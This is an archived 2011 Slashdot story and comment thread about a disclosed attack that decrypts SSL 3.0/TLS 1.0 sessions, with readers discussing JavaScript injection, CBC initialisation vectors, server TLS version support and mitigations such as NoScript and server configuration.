Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Encryption Security The Internet

Hackers Break Browser SSL/TLS Encryption 110

First time accepted submitter CaVp writes with an article in The Register about an exploit that appears to affect all browsers and can decrypt an active TLS session. From the article: "Researchers have discovered a serious weakness in virtually all websites protected by the secure sockets layer protocol that allows attackers to silently decrypt data that's passing between a webserver and an end-user browser." A full disclosure is scheduled for Friday September 23rd at the Ekoparty conference. Note that this only affects SSL 2.0 and TLS 1.0; unfortunately, most web servers are misconfigured to still accept SSL 2.0, and TLS 1.1 and 1.2 have seen limited deployment. The practicality of the attack remains to be determined (for one, it isn't very fast — but if the intent is just to decrypt the data for later use, that isn't an impediment).
This discussion has been archived. No new comments can be posted.

Hackers Break Browser SSL/TLS Encryption

Comments Filter:
  • gee golly I guess we better just turn it all off and call it quits before the hackers get us.
    • You do realize that 90% of websites out there still use only 2.0 as they are not 3.0 compliant?

    • Who do you do your banking with, I want to see if they are still using 2.0, as I know 90% ofg websites are still on 2.0 as we speak

  • Javascript (Score:4, Informative)

    by Hatta ( 162192 ) on Tuesday September 20, 2011 @02:20PM (#37459178) Journal

    From the looks of it, they use javascript on the target computer to capture some plain text which helps them break the keys. So as a temporary measure, disable javascript until browser makers catch up.

    • Re:Javascript (Score:4, Informative)

      by MightyMartian ( 840721 ) on Tuesday September 20, 2011 @02:22PM (#37459190) Journal

      Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

      • Re:Javascript (Score:5, Insightful)

        by Hatta ( 162192 ) on Tuesday September 20, 2011 @02:35PM (#37459318) Journal

        For one, /. works a lot better with javascript disabled.

      • by tlhIngan ( 30335 )

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        For quite a while, Apple's actually worked decently without javascript. Heck it even renders pretty much the same (it was only until I noticed things were a bit "off" that I realized NoScript was blocking it).

        I think though the iTunes pages have completely broken now as have a few others. But until recently, they had a site that worked and acted pretty good withou

      • The really awful ones that embed full-screen flash apps instead of javascript?
        • by Calos ( 2281322 )

          Not even those, any more many sites use JS to check for Flash and the installed version :/

      • Re:Javascript (Score:4, Insightful)

        by vlm ( 69642 ) on Tuesday September 20, 2011 @02:54PM (#37459496)

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        A good first order approximation is any website that is even vaguely attempting to be ADA compliant probably works fine without javascript.

        Run with "noscript" for awhile, maybe a couple years, and you'll come to agree.

        • by EdIII ( 1114411 )

          Most people don't even know what ADA compliant even means. Furthermore, what the heck does a client-side language have to do with disabled people? How does javascript inherently prevent a disabled person from interacting with a website?

          I don't have a single website that does not use javascript via JQuery. It just works.

          NoScript? Fine. As a default that is. You will run into more sites that require javascript to do something, than ones that do not. We just redirect to a page that asks you to turn on j

      • Re:Javascript (Score:5, Insightful)

        by dissy ( 172727 ) on Tuesday September 20, 2011 @04:07PM (#37460462)

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        As a happy noscript user I was about to reply similarly to VLM below...

        But instead it prompted me to check how many entries are in my noscript whitelist after using the same firefox profile for a bit over 3 years, and there are only 275 entries, of which 80 are various internal IPs for work related webapps and testing/development (Which I really need to clean out)

        I don't think it's too bad of a sign that in 3 years only 200 websites I've visited were 'broken' without javascript! I was actually expecting a much higher number.

        Even with that 200, or lets include the internal webapp sites at work and say 300, with the number of websites I've visited over the past three years it has to be in the high four digits. That is a pretty awesome ratio!

        Most websites really do not break enough to matter when rolling without javascript. Even in mitigating this type of attack, I would rather white list the few sites that need it than leave javascript blanket open to every website out there.

        Of course this solution isn't 100% perfect (It's "only" mostly perfect), so it will no doubt get poopoo'ed here on slashdot for not being over 100% perfect in every way

        • Usually I just temporarily allow sites so they don't end up in my white list. Many sites are broken without JS.
        • Don't you use the temporary permissions? I use them for most websites which I don't visit regularly, and AFAIK those don't appear in the whitelist.

          • by dissy ( 172727 )

            Don't you use the temporary permissions? I use them for most websites which I don't visit regularly, and AFAIK those don't appear in the whitelist.

            You are correct that temp items are not added to the whitelist (At least not the one you can export)

            I don't really use it though. Not in this way at least.

            When I first decide I want to allow a function on a website, if there are multiple domains listed (Usually embedded video pages are the worst at this), I will use temporary allow/block to find the right domain to allow just what I am wanting.

            Once I figure out which domains need allowed however, I go back and make them permanent. If I don't trust the web

      • by antdude ( 79039 )

        Doesn't Gopher have security vulnerabilities too? ;)

      • Pretty much all of mine. Just saying...
      • by PJ6 ( 1151747 )

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        Javascript will be long gone from mainstream by then.

      • Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        There are something on the order of a few million websites out there, maybe a few hundred million.

        95% of the time, you're probably visiting the same small set of websites, so just whitelist those. The other 5%? Temporary whitelist when you visit them. If they're worth visiting again, then maybe you whitelist them next week.

        Which is a big step up from let
    • by ge7 ( 2194648 )
      And how you think they will inject that javascript into the webpage, exactly? They cannot.
      • by Anonymous Coward

        Okay then how do we get malware infections from reputable sites? Yeah the easy way is just to buy ads, the info you harvest would make it well worth the investemnt. And as always human stupidity is unpatchable, you would be surprised by how many people click on links sent to them still.

      • me thinks you have spoken too soon. The right answer is "it depends". But, there are ways to get arbitrary javascript to run on web pages. cross site scripting, simple form submission of JS code, MiTM injection, malicious code on the server, etc.

        OR, you know something I don't. If so, please share.

        • Most of those won't work on an SSL connection. I think the only one that would is a compromised server, but if a (eg) Paypal server is compromised then you've got a lot bigger problems to worry about.

          • by Lennie ( 16154 )

            This is Man-in-the-Middle attack which injects the JavaScript code in the webpage in the SSL-stream I guess...?

            Or do it on the HTTP-page...?

            I guess we'll know in a few days.

            • This is Man-in-the-Middle attack which injects the JavaScript code in the webpage in the SSL-stream.

              SSL prevents that (it would be pretty useless otherwise...)

        • by framed ( 153355 )
          MiTM doesn't work against https unless the users are accepting bad certs already. If the page you're looking at was sent over https, its not alterable to include malicious javascript en-route. Someone on the network doesn't have your key, and so they can't spoof a request to take advantage of persistent https connections. XSS is dependent on your users looking at each others data and you not filtering it well. So unless your server or client are already owned (at which point this doesn't matter), or y
          • by Qzukk ( 229616 )

            If the question is simply a matter of figuring out the plaintext, why bother with javascript at all? After all, somewhere in the middle of this page is going to be the plaintext "If the question is a matter of figuring out the plaintext, why bother with javascript at all?"

      • Re:Javascript (Score:5, Informative)

        by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:37PM (#37459338)
        They can. Not only is Javascript injection possible, it has already been done by at least one malicious government [theregister.co.uk]: "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government, according to security experts and news reports."
        • Javascript injection into an SSL connection is a bit more difficult...

          • Re:Javascript (Score:4, Insightful)

            by increment1 ( 1722312 ) on Tuesday September 20, 2011 @03:32PM (#37460020)

            I think the idea is to inject the Javascript before the connection goes SSL. So maybe something like:

            1. You go visit www.gmail.com
            2. They intercept and return an http version of the page to you with the javascript injected
            3. The Javascript opens up an https connection with gmail.com, establishing the IV over a persistent connection.
            4. The Javascript redirects to the https page, so you don't notice the lack of https.
            5. You log in to the https page as normal, using the browsers already established https connection which they can apparently decrypt.

            If not for step 4, this attack would be little different than just intercepting and returning a non-https page and hoping that you didn't notice the difference. Depending on how long your browser keeps a persistent https connection open, I wonder if it is possible to have the javascript on an independent page, making the https requests to the target site to establish the connection before you even go to the target site.

            • Unless I'm very mistaken, SSL doesn't work like that. SSL is designed to prevent man-in-the-middle attacks. The session key for the encryption has to be signed using Google's public key - which the attacker can't do.

              (Or maybe they can, after all the recent hacks...)

              • Unless I'm very mistaken, SSL doesn't work like that. SSL is designed to prevent man-in-the-middle attacks. The session key for the encryption has to be signed using Google's public key - which the attacker can't do.

                The SSL session is signed, but according to this new attack, if an attacker can inject known plaintext and see the sniffed encrypted text of the same, then they can somehow manage to decrypt some portion (or all) further communication. So it is not breaking the establishment of the SSL connection (as a normal MITM attack would), it is directly decrypting the encrypted communication (the confidentiality component of SSL).

                • I'd be curious if the injected traffic has to be on the targetted site... I wonder if the approach is to inject the javascript on some non-encrypted page and use it to load the encrypted known text.
                  • by mzs ( 595629 )

                    That makes much more sense, I would expect to see the 'some of the data is not encrypted warning' with what increment1 proposed.

      • A lot of banks use services such as Advanced web analytics, which include bits of javascript from advanced-web-analytics.com inside their secure pages. I'm not sure how secure their servers are, but I for one have blocked their server on our proxy.
    • Come on, be logical. The only adequate response to a not-yet-presented attack vector that requires a packet sniffer on the network and injected Javascript in the webpage while taking hours to decrypt a single cookie is to stop using the Internet altogether until it gets fixed. Based on Slashdot user comments, it's the only reasonable thing to do.
  • by Anonymous Coward

    What would be the ramifications of disabling TLS 1.0 in the browser (Opera)? By default, TLS 1.0 is enabled and TLS 1.1 & 1.2 is disabled. Also, SSL 3 is enabled and there is no option for earlier versions, so I assume SSL 2 is already disabled in Opera.

    • by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:34PM (#37459314)
      The ramification is that you won't be able to use HTTPS on the vast majority of web sites. According to the Register [regmedia.co.uk], of 1 million web servers sampled: 604,242 supported TLS v1.0, 838 supported TLS v1.1, and 11 supported TLS v1.2.
    • by Necroman ( 61604 ) on Tuesday September 20, 2011 @02:37PM (#37459328)

      Stolen from the thread on this on reddit [reddit.com]:

      That's actually exactly how it's supposed to work. See Appendix E of the TLS 1.2 RFC. The client sends its highest-supported version in its first message, and the server replies with the highest-supported version that is less than or equal to the version the client sent.

      Unfortunately, some older (mostly third-party) servers break entirely if they receive something that they don't recognize. As such, TLS 1.1/1.2 is often disabled by default for compatibility reasons, even if it is supported.

      NSS (Mozilla/Firefox) and OpenSSL (used in Apache's mod_ssl) also only support up to TLS 1.0 in their stable versions, as there hasn't really been a compelling reason for them to add TLS 1.1/1.2 support until now.

    • by Ant P. ( 974313 )

      SSL2 has been gone in any decent browser for a long time now. The latest versions of Chrome (currently 15.0.874.1) don't even have checkboxes for SSL3/TLS any more, so fuck knows what data it's leaking behind my back...

      • by Calos ( 2281322 )

        Sure they do: Options -> Under the Hood. There's a checkbox for SSL 3.0, and one for TLS 1.0. So, similar to what the poster above you said, it looks like they don't expose TLS 1.1/1.2 in releases yet.

  • Not very fast? (Score:5, Interesting)

    by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:28PM (#37459264)

    The attack can apparently be completed in about 5 minutes. That is plenty of time for attacking the average online banking session, never mind gmail and other sites that people log in to for hours at a time.

    The attack appears to use javascript to push known plaintext over HTTPS to the web site before the actual login request is sent, so that the login credentials are transferred as part of a persistent SSL connection which now has a known IV. If this is correct, then the attack could be avoided by disabling persistent HTTPS connections in the browser. There is a performance cost to this, but I think most people would prefer to feel secure, and wouldn't really notice the extra costs of opening and closing individual HTTPS sessions for each browser request. Proxies might break that though.

  • Ah ha! (Score:5, Funny)

    by Howard Beale ( 92386 ) on Tuesday September 20, 2011 @02:32PM (#37459294)
    Now we know what that 30,000 node EC2 cluster was for...
  • unfortunately most web servers are misconfigured to still accept SSL 2.0, and TLS 1.1 and 1.2 have seen limited deployment.

    Uh, I'm pretty sure the web server is required to have enough flexibility for people to view the content. If the user demands security, that should to be negotiated by the client trying to use the most secure option possible. Saying a server is "misconfigured" might be nice for someone living in a bubble where everything is up to date and users have a clue, but in the real world serv

    • SSLv2 being accepted by the server is a misconfiguration.

      I manage multiple sites used by Fortune 100 companies (who are often slow to upgrade clients) and have had SSLv2 turned off on the server for years.

    • Re: (Score:3, Insightful)

      by izomiac ( 815208 )
      Fall back to regular HTTP then. There's no point in insecure HTTPS. Security is the "S" in these protocols and the sole reason for their existence. Someone who opts to use them has explicitly requested security, not compatibility, as most sites lack any form of SSL.

      For most bugs, you're right. Convenience trumps most other things in software. Security is not one of them. Your users are trusting you to keep them safe. An insecure browsing session will eventually (quickly?) lead to money being stole
      • > Fall back to regular HTTP then. There's no point in insecure HTTPS.

        But there is a point in insecure HTTP??

        > Security is the "S" in these protocols and the sole reason for their
        > existence.

        I know this is hard for guys like you to accept, but the much-touted "S" has become a ridiculous notion. Especially when coupled with some outlandish DEV-belief, that users "have a sense of security", trained or otherwise.
        SSL IN ITS CURRENT FORM IS BROKEN AND HAS BEEN SINCE THE BEGINNING!!

  • Surely Javascript sent from the server with which the SSL session has been made has the opportunity to read what's being transmitted to/from the server anyway? And third party Javascript doesn't get access to random SSL connections with other domains?

    What are these guys claiming? That known plaintext at the start of an SSL session plus access to all packets passing between client and server means further characters can eventually be worked out?

    • by dave562 ( 969951 )

      What are these guys claiming? That known plaintext at the start of an SSL session plus access to all packets passing between client and server means further characters can eventually be worked out?

      That seems to be what they are claiming. If you know at least SOME of what is encrypted, it becomes much easier to decrypt the rest.

  • It looks like the summary above is mistaken. TFA says that TLS 1.0 and before are affected. Shouldn't that include SSL 3.0 as well as 2.0? It matters because if the summary is correct, we can tell our browsers not to use TLS 1.0 but keep using SSL 3.0. If not, we're stuck waiting for fixes from, well, everybody.

    • by yuhong ( 1378501 )

      Yea, to the Slashdot editors:
       

      Note that this only affects SSL 3.0 and TLS 1.0

      • by blair1q ( 305137 )

        Nice. Guess which are the only two options available on this browser...

        • by yuhong ( 1378501 )

          Yea, SSL 2.0 has worse flaws, not only the protocol flaws but also that Netscape 1.x's random number generator was not really random too.

      • Yea, to the Slashdot editors:

         

        Note that this only affects SSL 3.0 and TLS 1.0

        The editors are too busy telling us that this is the first article from the submitter to be accepted; you can't expect them to perform that important function and actually glance at the article, now can you?

    • Yes, SSL 3.0 and TLS 1.0 are both affected. And yes, we'll be waiting on fixed from just about everyone. (Or, everyone may just move to TLS v1.1 - that's safe too.)

      Here's a page that's tracking this for file transfer applications that includes a nice discussion of general purpose web servers and browsers and their current "support of TLS v1.1" status at the end: http://www.filetransferconsulting.com/file-transferbeast-tls-vulnerability/ [filetransf...ulting.com]

  • So does it now affect sslv3 even with TLS1.0 activated? If not, then upgrade firefox. Version 6.0.2 has ssl2 disabled.

    • by GNious ( 953874 )

      While reading this, I received notification from Firefox that an update was available. Was thinking "That was quick!", but alas - is a fix for reducing memory footprint.

  • The Browser break hackers!

  • In my view, this should fix the error provided you change TLSv1 to 1.1 or 1.2. We are forced to run SSLv3 on our servers for PCI compliance.

    SSLProtocol -all +SSLv3 +TLSv1
    SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM#SSLv3:+HIGH:+MEDIUM

  • by Anonymous Coward

    This attack uses Javascript (previously-injected) to try to perform an adaptive chosen-plaintext attack (explicit mention of which dates from 2002[1]). TLS 1.1 and up use explicit random IVs for each CBC block to mitigate that attack, but TLS 1.0 and the older SSL protocols use the previous trailing ciphertext block as the IV for the next packet.

    I question whether it really brings anything new to the table as Javascript injection brings the ability to do much more devious things rather than messing around w

  • by Anonymous Coward

    It says "against a victim who is on a network on which they have a man-in-the-middle position" so they have installed monitoring software on the victims computer that gives them full access in which case why would they need this is the first place?

    • It's "man-in-the-middle" because it requires a javascript injection. That might be possible through vulnerabilities in particular websites (eg embedded ads with javascript, or a crafted link, etc). It could also be injected by an ISP.

  • by Anonymous Coward

    According to this post, OpenSSL using TLS 1.0 should not be susceptible:

    http://marc.info/?l=openssl-dev&m=131654410924995&w=2

    Don't know about NSS though.

  • SSH Tunneling (Score:3, Informative)

    by dendrope ( 2470388 ) on Monday September 26, 2011 @12:51AM (#37512518)
    If you have a computer at home running on a secured network, then SSH tunneling traffic while you're elsewhere should avert the problem.

"An idealist is one who, on noticing that a rose smells better than a cabbage, concludes that it will also make better soup." - H.L. Mencken

Working...